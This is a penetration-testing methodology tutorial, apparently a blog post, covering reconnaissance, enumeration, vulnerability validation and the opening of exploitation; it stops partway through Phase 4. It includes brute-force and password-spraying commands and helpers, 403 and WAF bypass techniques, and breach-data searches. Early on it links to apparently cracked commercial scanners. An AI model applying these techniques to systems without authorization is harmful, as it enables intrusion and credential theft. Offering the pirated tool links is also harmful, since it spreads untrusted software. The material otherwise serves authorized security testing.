Introduction
Vulnerability Assessment and Penetration Testing (VAPT) is often misunderstood by beginners as simply running automated scanners. In reality, professional security assessments follow a structured methodology that combines reconnaissance, enumeration, vulnerability discovery, exploitation, and impact analysis. This post walks through that methodology phase by phase; sources for further reading are linked at the end.
# Phase 0 — Engagement Kickoff & Preparation
Goal: Establish legal authorization, define scope boundaries, and ensure operational readiness before starting testing.
Key activities:
- scope definition
- allowed techniques
- rules of engagement
- testing window
- IP whitelisting
- environment preparation
Burp Suite Pro - https://github.com/xiv3r/Burpsuite-Professional
Acunetix Pro - https://youtu.be/jPQ3TD73hrI?si=u2MW-B_Q9hUZIRvt
https://drive.google.com/file/d/1-JTJzE6KBCejtwbLJ4zhniVQpYve1qMz/view?usp=sharing

# Phase 1 — Passive Reconnaissance (OSINT)
Passive reconnaissance is the first technical phase of a VAPT engagement. In this stage, the tester gathers intelligence without directly interacting with the target infrastructure.
This phase helps answer several key questions:
- What assets belong to the organization?
- What infrastructure is publicly exposed?
- What technologies are being used?
- What historical or leaked data may exist?
Unlike active scanning, passive reconnaissance does not send intrusive traffic to the target systems. Instead, it relies on publicly available information, threat intelligence platforms, and historical records.
The output of this phase should provide:
• Root domains
• Subdomains
• DNS records
• Infrastructure ownership
• Technology stack
• Email formats
• Historical assets
• Potential credential leaks

1.1 Domain & DNS Intelligence
The first step in reconnaissance is identifying the organization's domain footprint and DNS configuration.
This helps reveal:
- subdomains
- mail servers
- DNS infrastructure
- certificate transparency records
- CDN or proxy usage
These discoveries form the foundation of the entire attack surface.
Tools Used
Typical platforms and tools include:
- SecurityTrails
- DNSDumpster
- Netcraft
- Pentest-Tools DNS lookup
- crt.sh
- Shodan
- dig (or the Google Admin Toolbox Dig tool if you want a web interface)
- nslookup
- whois
- dnsrecon
Identify
During DNS intelligence gathering, attempt to identify:
• Root domain
• Subdomains
• MX records
• NS records
• TXT records
• Historical SSL certificates
• DNS provider
• CDN or proxy infrastructure

Command-Line Enumeration
WHOIS Lookup
WHOIS reveals domain ownership details and registrar information.
whois example.com

Useful information may include:
Registrar
Name servers
Registration dates
Administrative contacts

DNS Record Enumeration
Use dig to retrieve DNS records.
dig example.com

Query specific record types:
dig example.com MX
dig example.com NS
dig example.com TXT
dig example.com ANY

Example:
dig example.com MX +short

This returns the mail servers used by the organization.
Using nslookup
Another DNS querying tool:
nslookup example.com

Query mail servers:
nslookup -query=MX example.com

Query name servers:
nslookup -query=NS example.com

Automated DNS Enumeration
Use dnsrecon to perform automated enumeration.
dnsrecon -d example.com

Brute-forcing subdomains:
dnsrecon -d example.com -D wordlist.txt -t brt

This may reveal hidden subdomains.
Certificate Transparency Enumeration
Certificate logs often reveal additional subdomains.
Search:
https://crt.sh/?q=%25.example.com

Look for:
dev.example.com
staging.example.com
vpn.example.com
mail.example.com
These are frequently missed during normal DNS lookups.

Cross Verification
Always verify results across multiple sources:
- SecurityTrails
- Netcraft
- crt.sh
- DNS queries
Many tools miss subdomains, so combining sources improves coverage.
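Cross-verification is easy to script: crt.sh also serves results as JSON (append `&output=json` to the query), which can be merged with other sources. A minimal Python sketch, run here against an embedded sample rather than a live response:

```python
import json

def extract_subdomains(crtsh_json: str, root: str) -> set[str]:
    """Collect unique in-scope hostnames from a crt.sh JSON response.

    Each record's name_value field may hold several newline-separated
    names; wildcard prefixes are stripped, out-of-scope names dropped.
    """
    names = set()
    for record in json.loads(crtsh_json):
        for name in record.get("name_value", "").splitlines():
            name = name.strip().lower().lstrip("*.")
            if name == root or name.endswith("." + root):
                names.add(name)
    return names

# Illustrative sample mimicking crt.sh JSON output -- not real data.
sample = json.dumps([
    {"name_value": "dev.example.com\n*.staging.example.com"},
    {"name_value": "vpn.example.com"},
    {"name_value": "unrelated.example.org"},
])

subs = extract_subdomains(sample, "example.com")
```

The same function can absorb SecurityTrails or Netcraft exports once they are normalized to the same shape, which is the point of cross-verification.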
1.2 Infrastructure & ASN Mapping
After identifying domains, the next step is mapping the organization's infrastructure ownership.
Organizations often control IP ranges associated with their Autonomous System Number (ASN).
This allows testers to discover:
• IP ranges owned by the organization
• hosting providers
• exposed services
• shadow infrastructure

Tools Used
Common platforms include:
- Shodan
- Censys
- BGP.he.net
- DNSDumpster
- ASN-to-CIDR mapping services
Identify
Focus on identifying:
• ASN number
• CIDR ranges
• hosting providers
• internet-facing services

Example Workflow
Find ASN Information
Search the domain in BGP databases:
https://bgp.he.net/

Example result:
AS13335
AS16509

Convert ASN to CIDR Ranges
Once the ASN is known, determine associated IP ranges.
Example output:
104.16.0.0/13
172.64.0.0/13

These ranges may belong to the target organization.
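Checking whether a discovered host actually falls inside an ASN-derived range is a one-liner with Python's standard `ipaddress` module. A sketch using the example ranges above purely for illustration:

```python
import ipaddress

def in_scope(ip: str, cidrs: list[str]) -> bool:
    """Return True if the IP falls inside any of the given CIDR ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in ipaddress.ip_network(cidr) for cidr in cidrs)

# Example ranges from the ASN lookup above (illustrative only).
ranges = ["104.16.0.0/13", "172.64.0.0/13"]
```

This kind of scope filter is worth running over every IP resolved later in active reconnaissance, so out-of-scope hosts never get scanned.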
Investigate IP Ranges
Query Shodan for exposed services:
org:"Example Company"

or:
net:104.16.0.0/13

Shodan may reveal:
open ports
web servers
VPN gateways
RDP services
IoT devices

Note:
Shodan and Censys results must be validated during active reconnaissance later.
1.3 Technology Stack Identification
Understanding the technology stack helps guide later testing.
For example:
Apache + PHP → LFI, upload issues
Node.js → API vulnerabilities
WordPress → plugin vulnerabilities

Tools Used
Typical tools include:
- Wappalyzer
- BuiltWith
- WhatWeb
Command-Line Fingerprinting
Using WhatWeb
WhatWeb can identify web technologies automatically.
whatweb https://example.com

Example output:
Apache
PHP
WordPress
jQuery
Cloudflare

HTTP Header Analysis
Headers often reveal server technologies.
Using curl:
curl -I https://example.com

Example response:
Server: nginx
X-Powered-By: PHP/8.1

Using wget
Headers can also be inspected with wget.
wget --server-response --spider https://example.com

Browser Developer Tools
Inspect:
• Network responses
• JavaScript libraries
• cookies
• API endpoints

This often reveals hidden frameworks.
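Header-based fingerprinting is simple enough to script yourself. A sketch that pulls the technology-revealing headers out of a raw response (the sample mirrors the curl output above and is not from a real host):

```python
def tech_hints(raw_headers: str) -> dict[str, str]:
    """Extract fingerprint-relevant headers from a raw HTTP response."""
    interesting = {"server", "x-powered-by", "x-generator", "via"}
    hints = {}
    for line in raw_headers.splitlines():
        if ":" not in line:
            continue  # skip the status line and blank lines
        key, _, value = line.partition(":")
        if key.strip().lower() in interesting:
            hints[key.strip().lower()] = value.strip()
    return hints

# Illustrative response, matching the example above.
sample = "HTTP/1.1 200 OK\nServer: nginx\nX-Powered-By: PHP/8.1\nContent-Type: text/html"
hints = tech_hints(sample)
```

Run over a folder of saved responses, this gives a quick per-host technology table before heavier tools like WhatWeb are pointed at the target.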
1.4 Email & Credential OSINT
Email enumeration helps understand:
• employee structure
• email naming conventions
• potential credential leaks

It also assists in:
phishing simulations
password spraying
identity enumeration

Tools Used
Common tools include:
- Google dorking
- Hunter.io
- Apollo.io
- IntelX
- HaveIBeenPwned
- linkedin2username (there are other resources as well, like Snusbase)
- Hudson Rock
- theHarvester
Email Enumeration
Example using theHarvester:
theHarvester -d example.com -b all

Example sources:
Google
Bing
LinkedIn
PGP key servers

LinkedIn Enumeration
Employee lists can be converted into username formats.
Example:
linkedin2username -u https://linkedin.com/company/example -c 200

This generates potential username lists.
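The conversion from names to usernames follows a handful of common corporate formats. A hedged sketch (the format list is an assumption; narrow it down once the real email pattern is confirmed via Hunter.io):

```python
def username_candidates(full_name: str) -> set[str]:
    """Generate common corporate username formats from a full name."""
    parts = full_name.lower().split()
    first, last = parts[0], parts[-1]
    return {
        f"{first}.{last}",    # jane.doe
        f"{first}{last}",     # janedoe
        f"{first[0]}{last}",  # jdoe
        f"{first}{last[0]}",  # janed
        f"{last}.{first}",    # doe.jane
    }
```

Feeding every scraped employee name through this gives a spray-ready list even when the target's exact convention is not yet known.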
Breach Data Search
Check if credentials appear in breaches.
Search using:
- HaveIBeenPwned
- IntelX
- Hudson Rock
- Apollo.io
- Hunter.io
Example:
email@example.com

Possible findings:
password hashes
credential leaks
old passwords

Only passive verification should be performed at this stage.
1.5 Historical Presence & Legacy Exposure
Many organizations remove applications but forget to disable endpoints.
Historical archives can reveal:
• legacy admin panels
• old APIs
• deprecated login portals
• forgotten subdomains

Tools Used
- Wayback Machine
- Common Crawl
- Internet Archive
- Time machine
Extract Historical URLs
Example search:
https://web.archive.org/web/*/example.com

Look for paths such as:
/admin
/backup
/api/v1
/staging
/dev

These endpoints may still exist.
Correlate With Current Assets
Combine:
historical URLs
current subdomain list
active endpoints

Legacy endpoints often lead to high-impact vulnerabilities.
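The correlation itself is just set arithmetic: archived paths missing from the current sitemap are the "forgotten" candidates worth probing first. A sketch with invented data:

```python
def legacy_candidates(historical_paths: set[str], live_paths: set[str]) -> set[str]:
    """Paths seen in archives that are absent from the current sitemap.

    Paths still in the live map are already covered by normal testing;
    the difference is what may have been removed but never disabled.
    """
    return historical_paths - live_paths

# Hypothetical inputs: Wayback export vs. current crawl results.
historical = {"/admin", "/backup", "/api/v1", "/login"}
current = {"/login", "/api/v2"}
candidates = legacy_candidates(historical, current)
```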
1.6 Cloud & SaaS Footprint Identification
Many organizations rely heavily on cloud infrastructure.
Typical services include:
AWS
Azure
Google Cloud
Auth0
Stripe
CRM systems

Identifying cloud infrastructure helps reveal:
storage buckets
API gateways
serverless functions
authentication providers

Tools Used
- Shodan
- Censys
- GitHub search
- Google dorking
Example Searches
Search GitHub for exposed references:
"example.com" aws
"example.com" api_key
"example.com" secret

Google dorks:
site:github.com "example.com"
site:pastebin.com "example.com"

1.7 Public Code & Configuration Leakage
Developers sometimes accidentally publish internal code or configuration files.
These may expose:
API keys
database credentials
internal endpoints
configuration secrets

Tools Used
Typical tools include:
- TruffleHog
- Gitrob
- Gato
- BBOT
GitHub Secret Scanning
Example:
trufflehog https://github.com/example/repository

This scans commit history for:
API keys
private tokens
AWS credentials
passwords

What to Look For
Common secrets:
AWS_ACCESS_KEY
DB_PASSWORD
JWT_SECRET
API_KEY

Also check for:
internal IP addresses
private repositories
configuration files

Output of Phase 1
By the end of Passive Reconnaissance, you should have collected:
• root domains
• subdomains
• DNS records
• ASN and infrastructure mapping
• technology stack
• email patterns
• leaked credentials (if any)
• historical endpoints
• potential cloud infrastructure
• publicly exposed code or secrets

This information becomes the foundation for Phase 2 — Active Reconnaissance and Enumeration, where discovered assets are validated and expanded.
Engagement Strategy & Operator Notes
A structured VAPT methodology should not be treated as a rigid checklist where every step is executed blindly. In real-world engagements, efficiency, stealth, and decision-making play a critical role in determining success. At every phase, the tester must make informed decisions based on observed behavior rather than strictly following all possible techniques. For example, if a Web Application Firewall (WAF) is detected to be aggressive, fuzzing intensity should be reduced, payloads should be encoded or obfuscated, and more reliance should be placed on passive analysis and bypass techniques. Similarly, if subdomain enumeration yields minimal results, effort should be redirected toward ASN expansion and infrastructure-level discovery. If APIs are identified early, priority should shift toward API-specific testing rather than traditional web fuzzing. Login panels, authentication flows, and exposed administrative interfaces should always be treated as high-value targets and tested early in the engagement.
Time and resource management is equally important. Not all tools and scans should be executed simultaneously without purpose. High-value targets such as authentication endpoints, exposed services, and known vulnerable components should be prioritized over blind scanning. Automated tools like OWASP ZAP may generate excessive noise and trigger defensive mechanisms, whereas tools like Nuclei provide fast coverage but require proper template selection to avoid irrelevant results. Burp Suite Scanner offers deeper analysis but at the cost of time and resource consumption. Therefore, understanding the trade-off between coverage, depth, and noise is essential.
False positives are a common issue in automated scanning and must always be handled systematically. Every identified vulnerability should be manually validated by reproducing the issue without scanner-generated payloads, ensuring consistent behavior across multiple attempts, and confirming real impact. A finding should only be considered valid if it is reproducible and demonstrably exploitable under controlled conditions.
Evidence collection must follow a consistent structure to ensure findings are clear and report-ready. Each validated issue should include the complete request and response pair, affected endpoint, timestamp, reproduction steps, and a concise impact explanation. Screenshots and session artifacts should support the proof-of-concept but not replace technical validation.
Testing should also adapt based on engagement mode. In stealth mode, the focus should be on passive reconnaissance, low request rates, and manual testing to avoid detection. In aggressive mode, full-scale fuzzing, automated scanners, and high request volumes can be used when detection is not a concern. Choosing the appropriate mode depends on scope, rules of engagement, and target sensitivity.
A common mistake in VAPT engagements is over-reliance on automated tools while ignoring deeper analysis areas such as JavaScript files, API endpoints, and business logic flaws. Many critical vulnerabilities exist in logic rather than input validation and require manual exploration. Similarly, skipping authentication and authorization testing or failing to validate subdomains properly can result in missed high-impact findings.
Finally, vulnerabilities should never be viewed in isolation. Real-world attackers chain multiple weaknesses together to achieve meaningful impact. Instead of focusing only on individual issues, the tester should continuously think in terms of attack paths — identifying entry points, escalation opportunities, and potential impact. The ultimate goal is not just to find vulnerabilities, but to demonstrate how they can be combined to compromise the system in a realistic scenario.
# Phase 2 — Active Reconnaissance & Enumeration
Active reconnaissance is the phase where we begin direct interaction with the target infrastructure.
Unlike passive reconnaissance, this phase involves:
• Sending requests
• Validating discovered assets
• Expanding attack surface
• Mapping real entry points
The goal is to convert collected intelligence into exploitable attack surface.
2.1 Subdomain Validation & Expansion
After collecting subdomains during passive reconnaissance, the next step is to validate and expand them.
Not all discovered subdomains are alive. Some may:
- No longer exist
- Be internal-only
- Be legacy endpoints
At the same time, active techniques help uncover additional hidden subdomains, especially across staging and development environments.
Tools Used
- Amass
- Sublist3r
- Subbrute
- Subfinder
- ffuf
- puredns
- httpx
- crt.sh
- SecurityTrails
- GitHub / GitLab
Start by validating collected subdomains and checking which ones are live:
subfinder -d example.com | httpx -web-server -method -websocket -ip

This helps identify:
- Live hosts
- Response behavior
- Associated IP addresses
For deeper enumeration, use active techniques:
amass enum -active -d example.com

Brute-forcing subdomains:
ffuf -u https://FUZZ.example.com -w wordlist.txt

High-speed resolution with PureDNS:
puredns bruteforce wordlist.txt example.com -r resolvers.txt

Things to identify:
- Live vs dead subdomains
- Dev / staging environments
- IP mappings per subdomain
Subdomains that are not reachable should still be investigated. Check them in the Wayback Machine to understand their historical usage.
These often expose:
- Deprecated applications
- Old admin panels
- Legacy APIs
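Dev/staging hosts usually follow predictable naming, so known subdomains can be expanded into candidate variants before brute forcing. A small generator sketch (the environment labels are an assumption; tune them per target) whose output feeds puredns or ffuf:

```python
def env_permutations(subdomain: str, root: str = "example.com") -> list[str]:
    """Expand a known subdomain into likely environment variants."""
    envs = ["dev", "staging", "test", "uat", "qa"]  # assumed common labels
    label = subdomain.removesuffix("." + root)
    out = []
    for env in envs:
        out.append(f"{env}.{subdomain}")     # e.g. dev.api.example.com
        out.append(f"{label}-{env}.{root}")  # e.g. api-dev.example.com
        out.append(f"{env}-{label}.{root}")  # e.g. dev-api.example.com
    return out

perms = env_permutations("api.example.com")
```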
2.2 WAF & Defense Validation
Before performing aggressive enumeration or fuzzing, it is important to understand the defensive mechanisms protecting the target.
Modern applications are often protected by:
- Web Application Firewalls (WAF)
- CDNs (Cloudflare, Akamai, etc.)
- Rate limiting systems
These controls directly impact how you perform testing.
Tools Used
- wafw00f
- WhatWAF
- Burp Suite
Start by identifying whether a WAF is present:
wafw00f https://target.com

In addition to automated tools, manually inspect responses using Burp Suite:
- Look for security headers
- Observe blocked requests
- Identify unusual response patterns
Things to identify:
- WAF presence
- Vendor (Cloudflare, Akamai, etc.)
- Response behavior under load
Test for:
- Rate limiting
- Request blocking thresholds
- Payload filtering
Sometimes multiple WAF layers exist (e.g., CDN + backend firewall), so behavior testing is important.
This step helps you:
- Tune fuzzing speed
- Avoid IP bans
- Adjust payload encoding
2.3 Network & Service Enumeration
Once subdomains and IPs are identified, the next step is to enumerate open ports and services.
This should include:
- IPs mapped from subdomains
- IP ranges derived from ASN
Tools Used
- Nmap
- Naabu
- Masscan
- Netcat
- hping3
Start with a full scan:
nmap -p- -A target.com

For faster scanning:
naabu -host target.com

You can also scan ASN-derived IP ranges for additional assets.
Things to identify:
- Open ports
- Running services
- Service versions
Cross-verify findings with:
- Shodan
- Censys
This ensures:
- Accuracy
- Removal of false positives
Open ports directly define your attack surface. For example:
- 22 → SSH attacks
- 80/443 → Web vulnerabilities
- 445 → SMB exploitation
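Scan output is easier to triage programmatically. nmap's grepable format (`-oG`) puts each host's ports on one line; a parsing sketch against a sample line (the host is fictitious, and real `-oG` output contains additional fields this sketch ignores):

```python
import re

def parse_grepable(line: str) -> tuple[str, list[int]]:
    """Extract host and open TCP ports from one nmap -oG 'Ports:' line."""
    host = line.split()[1]  # second whitespace-separated token is the IP
    ports = [int(m.group(1)) for m in re.finditer(r"(\d+)/open/tcp", line)]
    return host, ports

# Illustrative -oG line (fictitious host).
sample = ("Host: 192.0.2.10 ()\tPorts: 22/open/tcp//ssh///, "
          "80/open/tcp//http///, 443/open/tcp//https///")
host, ports = parse_grepable(sample)
```

The resulting host-to-ports map is a convenient basis for assigning follow-up tests (SSH, web, SMB) per host.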
2.4 Web Application Mapping
This phase focuses on building a complete map of the application.
Understanding the structure helps identify:
- Attack entry points
- Functional flows
- Hidden endpoints
Tools Used
- Burp Suite Pro (crawler & sitemap)
- ffuf
- dirsearch
- feroxbuster
- gospider
- katana
- gau
- kiterunner
- sub404
Start by crawling the application using Burp Suite and generating a sitemap.
For directory and endpoint enumeration:
ffuf -u https://target.com/FUZZ -w wordlist.txt -recursion

Crawling using Katana:
katana -jc -u https://target.com

Things to identify:
- Hidden directories
- API endpoints
- Parameters
- Third-party integrations
Pay close attention to:
- File upload/download functionality
- Authentication flows
- Admin/debug endpoints
This step results in a complete application attack surface map.
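Crawler output (katana, gau, Burp sitemap exports) can be reduced to a unique parameter inventory with the standard library alone. A sketch with made-up URLs:

```python
from urllib.parse import urlparse, parse_qs

def parameter_inventory(urls: list[str]) -> dict[str, set[str]]:
    """Map each path to the set of query parameter names seen on it."""
    inventory: dict[str, set[str]] = {}
    for url in urls:
        parsed = urlparse(url)
        if not parsed.query:
            continue  # no parameters on this URL
        params = inventory.setdefault(parsed.path, set())
        params.update(parse_qs(parsed.query, keep_blank_values=True))
    return inventory

# Hypothetical crawl results.
crawled = [
    "https://target.example/search?q=test&page=2",
    "https://target.example/search?sort=desc",
    "https://target.example/about",
]
inventory = parameter_inventory(crawled)
```

Every parameter name in this inventory becomes a candidate for the manual testing in Phase 3.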
2.5 JavaScript Enumeration & Drift Analysis
JavaScript files often contain critical hidden information that is not visible during normal browsing.
These files may expose:
- Internal APIs
- Hardcoded secrets
- Hidden functionality
Tools Used
- LinkFinder
- Burp JSLinkFinder
- getJS
- jsluice
- jsleak
Extract JavaScript files from:
- Burp Suite
- Crawlers
- Browser DevTools
Focus on keyword searching:
- api
- key
- token
- password
- admin
Also analyze:
- DOM sources and sinks
- Client-side validation
This helps identify:
- Hidden endpoints
- DOM-based vulnerabilities
JavaScript analysis is often a high-signal step for finding deeper attack vectors.
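The keyword hunt can be automated with a LinkFinder-style regex pass. A deliberately simplified sketch (the pattern is loose and will need tuning per target; the sample script content is invented):

```python
import re

# Loose pattern for quoted relative paths such as "/api/v1/users".
ENDPOINT_RE = re.compile(r"""["'](/[A-Za-z0-9_\-./]+)["']""")

def js_endpoints(source: str) -> set[str]:
    """Pull candidate endpoint paths out of JavaScript source text."""
    return set(ENDPOINT_RE.findall(source))

# Illustrative JavaScript snippet.
sample_js = """
const base = "/api/v1";
fetch("/api/v1/users", {headers: {"X-Token": token}});
window.location = "/admin/debug";
"""
endpoints = js_endpoints(sample_js)
```

Expect false positives (MIME types, file paths); the value is surfacing endpoints the crawler never triggered.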
2.6 CMS & Framework-Specific Enumeration
If a CMS or framework is identified, perform targeted enumeration.
Different platforms have different weaknesses. For example:
- WordPress → plugin vulnerabilities
- Joomla → extension issues
- AEM → misconfigurations
Tools Used
- WPScan
- CMSmap
- joomscan
- wprecon
- pyfiscan
- aemscan
Example WordPress scan:
wpscan --url https://target.com

Things to identify:
- Installed plugins
- Themes
- Versions
Outdated components often map directly to:
- Known CVEs
- Public exploits
This step allows for focused vulnerability testing instead of blind fuzzing.
2.7 Application Error Handling Enumeration
Error messages can reveal sensitive backend information.
These are often triggered during:
- Invalid inputs
- Broken requests
- Edge-case scenarios
Tools Used
- Burp Suite
- Arjun
Example parameter discovery:
arjun -u https://target.com

Things to identify:
- Stack traces
- Debug messages
- Backend file paths
These leaks may expose:
- Internal logic
- Database structure
- Framework behavior
2.8 HTTP Method Enumeration
Applications sometimes expose unintended HTTP methods.
These can lead to unexpected behavior or security issues.
Check supported methods:
- OPTIONS request
- Manual testing via Burp
Things to identify:
- PUT
- DELETE
- PATCH
Misconfigured methods may allow:
- Unauthorized file uploads
- Data modification
- Access control bypass
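The Allow header returned by an OPTIONS request can be triaged automatically. A sketch that flags state-changing methods for manual follow-up (the "risky" set is an assumption based on the list above):

```python
RISKY = {"PUT", "DELETE", "PATCH", "TRACE"}  # assumed high-interest methods

def risky_methods(allow_header: str) -> set[str]:
    """Return methods from an Allow header that warrant manual testing."""
    methods = {m.strip().upper() for m in allow_header.split(",") if m.strip()}
    return methods & RISKY
```

Note that servers sometimes advertise methods they do not honor (and vice versa), so each flagged method still needs a real request through Burp.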
2.9 Content-Type & Serialization Enumeration
Different content types introduce different attack surfaces.
Understanding how the application processes data is critical.
Identify usage of:
- JSON
- XML
- multipart/form-data
These can lead to:
- XXE (XML)
- API abuse (JSON)
- Deserialization attacks
Also observe:
- Request/response formats
- Backend parsing behavior
This step prepares you for deep vulnerability testing in Phase 3.
WHAT WE HAVE TILL NOW
At this stage, we have:
Validated and expanded subdomains
IP mappings (domain + ASN)
Open ports and services
Full application sitemap
Endpoints and parameters
JavaScript-derived intelligence
WAF behavior and defenses
CMS-specific attack surface
Email and breach context (from Phase 1)

# Phase 3 — Vulnerability Discovery & Validation
This phase focuses on identifying, validating, and prioritizing vulnerabilities across the entire attack surface discovered in earlier phases.
The goal is not just to find issues, but to:
- Confirm exploitability
- Eliminate false positives
- Understand real attack impact
3.1 Automated Vulnerability Scanning
Automated scanning provides a broad coverage baseline by identifying known vulnerabilities, misconfigurations, and exposed services.
Different scanners use different approaches:
- Signature-based detection
- Behavior-based analysis
- Template-driven scanning
Tools Used
- Burp Suite Pro (Scanner)
- Nessus
- Acunetix
- Nikto
- Nmap NSE
- Nuclei
- Sn1per
- BlackWidow
- flan
- jaeles
- Osmedeus
- OWASP ZAP (noisy)
Run scans against:
- Verified subdomains
- Key application endpoints
- Identified IPs and services
Example Nuclei scan:
nuclei -u target.com -t cves

Nmap NSE scan:
nmap --script vuln target.com

Run scans from:
- Local machine
- VPS (for scalability and parallel execution)
Important: All automated findings must be manually validated to remove false positives.
Output of this step:
- Initial vulnerability list
- Scanner-based indicators
3.2 403 / 404 Bypass Techniques
Applications often restrict access to sensitive endpoints using status codes like 403 Forbidden or hidden routes.
These protections are frequently bypassable.
Tools Used
- XFFenum
- NoMore403
- Forbidden Buster
These tools attempt bypass techniques such as:
- Header manipulation (X-Forwarded-For, etc.)
- Path traversal variations
- Encoding tricks
Things to identify:
- Hidden admin panels
- Restricted APIs
- Internal endpoints
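What these tools do under the hood can be sketched as a request-variant generator. The headers and path mutations below are commonly tried bypass candidates; coverage here is deliberately minimal compared to the real tools:

```python
def bypass_variants(path: str) -> list[dict]:
    """Generate request variants commonly tried against 403 responses."""
    header_tricks = [
        {"X-Forwarded-For": "127.0.0.1"},  # pretend to be an internal client
        {"X-Original-URL": path},          # some front ends route on this
        {"X-Rewrite-URL": path},
    ]
    path_tricks = [path + "/", path + "/.", "/%2e" + path, path + "%20"]
    variants = [{"path": path, "headers": h} for h in header_tricks]
    variants += [{"path": p, "headers": {}} for p in path_tricks]
    return variants

variants = bypass_variants("/admin")
```

Each variant is then replayed and any non-403 response compared against the original for real content differences.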
3.3 Origin IP Discovery
If the application is behind a CDN or WAF, identifying the origin IP can allow direct access to the backend server.
Tools Used
- CloudRip
- hakoriginfinder
These tools help:
- Identify real server IP behind CDN
- Bypass WAF protections
Once identified, the origin IP should be:
- Scanned directly
- Tested for exposed services
3.4 Brute Force & Password Spraying
Authentication systems are often vulnerable to:
- Weak credentials
- Credential reuse
- Poor rate limiting
Tools Used
- Burp Suite (Intruder — cluster bomb with IP rotation)
- owabrute
- hydra
- DefaultCreds cheat sheet
Hydra example:
hydra -l admin -P passwords.txt target.com http-post-form

Things to test:
- Login portals
- Email services
- Internal panels
Use:
- Credential lists from breach data
- Custom wordlists
Goal:
- Gain valid access without exploitation
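Spraying must respect lockout policy: few passwords per window, many accounts, long pauses between rounds. A scheduling sketch (the attempts-per-window default is a placeholder; use the thresholds agreed in the rules of engagement):

```python
def spray_rounds(users: list[str], passwords: list[str],
                 attempts_per_window: int = 2) -> list[list[tuple[str, str]]]:
    """Group (user, password) attempts into lockout-safe rounds.

    Each round tries at most attempts_per_window passwords against
    every user; the operator waits out the lockout window between rounds.
    """
    rounds = []
    for i in range(0, len(passwords), attempts_per_window):
        batch = passwords[i:i + attempts_per_window]
        rounds.append([(u, p) for p in batch for u in users])
    return rounds

# Hypothetical inputs.
schedule = spray_rounds(["alice", "bob"],
                        ["Winter2024!", "Spring2024!", "Company123"])
```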
3.5 Manual Web Vulnerability Testing
Automated tools miss logic-based vulnerabilities. Manual testing is where real vulnerabilities are confirmed.
Tools Used
- Burp Suite (Repeater, Intruder)
- Browser testing
- Custom payloads
- Awesome bug bounty tools (for exploitation support)
Techniques Used
- Parameter tampering
- Input validation testing
- Business logic analysis
Test for:
- SQL Injection
- XSS (Reflected, Stored, DOM-based)
- CSRF
- IDOR
- Open Redirect
- File Inclusion (LFI/RFI)
- Command Injection
- Template Injection
Activities:
- Test all parameters identified in Phase 2
- Modify requests manually
- Observe backend behavior
Goal:
- Confirm exploitability
- Understand impact
Output:
- Confirmed vulnerabilities
- Manual validation notes
3.6 Authentication & Authorization Testing
This step evaluates how well the application enforces identity and access control.
Tools Used
- Burp Suite
- Browser DevTools
Techniques Used
- Access control testing
- Session handling analysis
- Privilege boundary testing
Test for:
- Authentication bypass
- Weak password policies
- Session fixation
- Improper session invalidation
- Authorization bypass (horizontal & vertical)
Activities:
- Replay session tokens
- Modify user roles
- Access restricted endpoints
Goal:
- Identify privilege escalation paths
Output:
- Authentication weaknesses
- Authorization flaws
3.7 File Handling Vulnerability Testing
File upload and download functionality often leads to high-impact vulnerabilities.
Tools Used
- Burp Suite
- Manual payload crafting
Techniques Used
- File upload bypass
- Path manipulation
- File validation testing
Test for:
- Unrestricted file upload
- MIME-type bypass
- Extension bypass
- File overwrite
- Insecure file download (IDOR/LFI)
Activities:
- Upload crafted files
- Modify file paths
- Analyze storage behavior
Goal:
- Achieve file execution or sensitive data access
Output:
- File handling vulnerabilities
- RCE candidates
3.8 API Vulnerability Testing (If Applicable)
APIs expose structured attack surfaces and are often poorly secured.
Tools Used
- Burp Suite
- ffuf
- Postman
- fuzzapi
Techniques Used
- Endpoint abuse
- Method manipulation
- Object-level testing
Test for:
- Broken Object Level Authorization (BOLA)
- Excessive data exposure
- Improper method handling
- Mass assignment
Activities:
- Modify request bodies
- Change HTTP methods
- Test authorization controls
Output:
- API vulnerabilities
- Access control issues
3.9 Network & Service-Level Vulnerability Validation
Beyond web applications, services and infrastructure must also be tested.
Tools Used
- Nmap NSE
- Nessus
- Netcat
Techniques Used
- Misconfiguration testing
- Version-based validation
Activities:
- Validate scanner findings
- Map service versions to CVEs
- Interact manually with services
Goal:
- Confirm externally exploitable services
Output:
- Network-level vulnerabilities
- Service exploitation candidates
3.10 CMS & Component Vulnerability Validation
If CMS or frameworks are identified, validate vulnerabilities specific to them.
Tools Used
- WPScan
- Manual CVE testing
Activities:
- Test plugins and components
- Validate exploitability
- Remove false positives
Goal:
- Identify real exploitable components
Output:
- CMS-specific vulnerabilities
3.11 Vulnerability Correlation & Prioritization
At this stage, multiple vulnerabilities exist across different layers.
The goal is to connect them into meaningful attack paths.
Techniques Used
- Risk-based analysis
- Attack surface correlation
Activities:
- Correlate findings across:
- Web
- API
- Network
- Authentication
- File handling
Identify:
- Attack chains
- Weakest entry points
Prioritize based on:
- Impact
- Exploitability
- Exposure
Output:
- Prioritized vulnerability list
- Attack chain candidates
WHAT WE HAVE TILL NOW
At this stage, we have:
Validated vulnerabilities across web applications, APIs, and network services
Scanner-based findings filtered and manually verified (false positives removed)
Confirmed web vulnerabilities (SQLi, XSS, IDOR, LFI/RFI, command injection, etc.)
Authentication and authorization weaknesses identified
File handling vulnerabilities and potential RCE vectors
API-specific vulnerabilities (BOLA, mass assignment, improper access control)
Network/service-level vulnerabilities mapped with CVE correlation
CMS and component-level exploitable weaknesses
Successful 403/404 bypass vectors (if applicable)
Origin IP identified (if behind WAF/CDN) and tested
Valid credentials obtained via brute force / password spraying (if successful)
Curated credential lists and improved attack wordlists
Initial access points and multiple exploitation candidates

# Phase 4 — Exploitation & Impact Assessment
This phase focuses on demonstrating real-world impact by safely exploiting validated vulnerabilities.
The objective is not to cause damage, but to:
- Prove exploitability
- Demonstrate business impact
- Build realistic attack scenarios
All actions should be controlled, minimal, and evidence-driven.
4.1 Exploitation Planning & Selection
Not all vulnerabilities should be exploited. This step ensures exploitation is targeted, safe, and meaningful.
Techniques Used
- Risk-based exploitation
- Controlled proof-of-concept execution
Select vulnerabilities based on:
- High impact
- High exploitability
- Low risk of system instability
Define:
- Exploitation goals (access, data exposure, execution)
- Success criteria
- Rollback and cleanup steps
This step ensures:
- No unnecessary disruption
- Clear direction for exploitation
Output:
- Exploitation plan
- Selected vulnerability set
4.2 Web Application Exploitation
This step focuses on exploiting vulnerabilities in the application layer.
Tools Used
- Burp Suite
- Custom payloads
- Manual browser testing
Techniques Used
- Payload-based exploitation
- Business logic abuse
- Use of GTFOBins and PayloadsAllTheThings
Exploit:
- SQL Injection → extract limited data
- XSS → controlled payload execution
